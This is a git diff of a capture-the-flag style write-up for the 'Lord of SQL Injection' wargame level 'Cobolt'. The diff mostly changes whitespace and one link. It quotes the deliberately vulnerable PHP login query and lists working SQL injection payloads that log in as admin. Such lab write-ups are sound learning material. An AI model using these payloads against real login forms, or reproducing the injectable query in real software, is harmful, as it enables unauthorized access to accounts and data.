--- a/Wargame/Lord of SQL Injection/02. Cobolt.md
+++ b/Wargame/Lord of SQL Injection/02. Cobolt.md
@@ -4,27 +4,27 @@ This problem wants to make sure you know basic **SQL injection**
 
 ## 2. Analize codes  
     <?php
-      include "./config.php"; 
+      include "./config.php";
       login_chk();
       dbconnect();
-      
+
       if(preg_match('/prob|_|\.|\(\)/i', $_GET[id]))  
         exit("No Hack ~_~");  
 
       if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw]))
         exit("No Hack ~_~");   
 
-      $query = "select id from prob_cobolt where id='{$_GET[id]}' and pw=md5('{$_GET[pw]}')"; 
-      
-      echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
-      $result = @mysql_fetch_array(mysql_query($query)); 
+      $query = "select id from prob_cobolt where id='{$_GET[id]}' and pw=md5('{$_GET[pw]}')";
+
+      echo "<hr>query : <strong>{$query}</strong><hr><br>";
+      $result = @mysql_fetch_array(mysql_query($query));
       if($result['id'] == 'admin')  
         solve("cobolt");
-      
+
       elseif($result['id'])  
-        echo "<h2>Hello {$result['id']}<br>You are not admin :(</h2>"; 
-      
-      highlight_file(__FILE__); 
+        echo "<h2>Hello {$result['id']}<br>You are not admin :(</h2>";
+
+      highlight_file(__FILE__);
     ?>
 
 ### 1. preg_match()
@@ -55,19 +55,19 @@ These are id and pw.
 
 If we use id parameter, we use annotation keyword.  
 And if we use pw parameter, we have to use ) char to escape md5() function.  
-  
+
 ### Using Keyword  
 
     or | ' | ) | --
 
 ### These are my answers.
-    
+
     ?id=admin'%20--%20  
-      
+
     ?pw=')or id=('admin
 
     ?pw=')||id='admin'%20--%20
 
 **Lastly, There can be many answers**
 
-**[Go to see other solutions](https://github.com/moreal/TIL/blob/master/Security/WarGame/WriteUp/los.eagle-jump.org/00.%20ReadMe.md)**
+**[Go to see other solutions](https://github.com/moreal/WriteUp/blob/master/Wargame/Lord%20of%20SQL%20Injection/00.%20ReadMe.m)**
